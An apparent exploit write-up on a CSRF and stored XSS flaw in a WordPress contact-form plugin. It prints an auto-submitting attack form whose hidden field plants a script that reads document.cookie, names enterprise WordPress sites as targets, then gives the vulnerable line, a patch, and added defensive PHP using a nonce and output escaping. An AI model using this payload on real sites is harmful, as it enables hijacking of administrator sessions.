Contact Form To Email (https://wordpress.org/plugins/contact-form-to-email/) is a contact form plugin with 30 thousand users..
The latest version of the plugin contains CSRF and XSS vulnerabilities, including a 0day..
I am explaining the exploit and how to use it in detail (tested on Win7 with Google Chrome)
Footnote: Using Mozilla is more advantageous..
First, let's take a look at the exploit code
<html>
<bOdy>
<form name="updatereportsettings" action="http://localhost/wordpress/wp-admin/admin.php?page=cp_contactformtoemail" method="post">
<input type="hidden" name="cp_cfte_rep_enable" value="No">
<input type="hidden" name="cp_cfte_rep_hour" value="00">
<input name="cp_cfte_fp_from_email" value="Hidden" type="hidden">
<input name="cp_cfte_rep_emails" value="Hidden" type="hidden">
<input name="cp_cfte_rep_subject" value="hidden" type="hidden">
<input type="hidden" name="cp_cfte_rep_emailformat" value="text">
<input type="hidden" name="cp_cfte_rep_message" value='"></textarea><script>alert(document.cookie)</script>'>
<script language="Javascript">
setTimeout('updatereportsettings.submit()', 1);
</script>
</form>
</bOdy>
</html>
Pay attention to the part highlighted in green... Now let's move on to the vulnerable code.
<textarea type="CyberWarrior Bilisimin Yer Alti Dünyasi" name="cp_cfte_rep_message" rows="3" cols="80"><?php echo get_option('cp_cfte_rep_message', 'Attached you will find the data from the form submissions.'); ?></textarea></td>
and the XSS patch..
<textarea type="CyberWarrior Bilisimin Yer Alti Dünyasi" name="cp_cfte_rep_message" rows="3" cols="80"><?php echo htmlspecialchars(get_option('cp_cfte_rep_message', 'Attached you will find the data from the form submissions.')); ?></textarea></td>
[#] We are using php echo.
[#] attack : http://hedef/wordpress/wp-admin/admin.php?page=cp_contactformtoemail
[#] target : special sites with an enterprise-based WP system integrated
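The patch above only escapes the output, so the CSRF half of the issue (the auto-submitting form) is still open. The following is an added example, not the plugin's own code, of a settings handler that closes both sides: a capability check plus a WordPress nonce on save, and esc_textarea() on output. The cfte_example_* function names and the nonce action/field names are assumptions; the WordPress API calls used are real.

```php
<?php
// Added example (not the plugin's code). Function names prefixed
// cfte_example_ are hypothetical; the WordPress API functions are real.

function cfte_example_save_report_settings() {
    // Only act on our own form submission.
    if ( ! isset( $_POST['cfte_example_save'] ) ) {
        return;
    }
    // 1. Capability check: only administrators may change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // 2. CSRF defence: the nonce is bound to this user's session and this action,
    //    so a form auto-submitted from a third-party page (as in the post above)
    //    fails here and never reaches update_option().
    check_admin_referer( 'cfte_example_update_report', 'cfte_example_nonce' );

    // 3. Sanitise the input before storing it.
    $message = isset( $_POST['cp_cfte_rep_message'] )
        ? sanitize_textarea_field( wp_unslash( $_POST['cp_cfte_rep_message'] ) )
        : '';
    update_option( 'cp_cfte_rep_message', $message );
}

function cfte_example_render_report_settings() {
    $message = get_option(
        'cp_cfte_rep_message',
        'Attached you will find the data from the form submissions.'
    );
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'cfte_example_update_report', 'cfte_example_nonce' ); ?>
        <textarea name="cp_cfte_rep_message" rows="3" cols="80"><?php
            // 4. Output escaping: esc_textarea() encodes <, >, " and &, so a stored
            //    value such as "></textarea><script>... stays inside the textarea as
            //    literal text instead of closing it and starting a script element.
            echo esc_textarea( $message );
        ?></textarea>
        <input type="submit" name="cfte_example_save" value="Save" />
    </form>
    <?php
}
```

Calling cfte_example_save_report_settings() before cfte_example_render_report_settings() on the settings page gives the same save-then-display flow as the original, with the nonce check and output escaping in place.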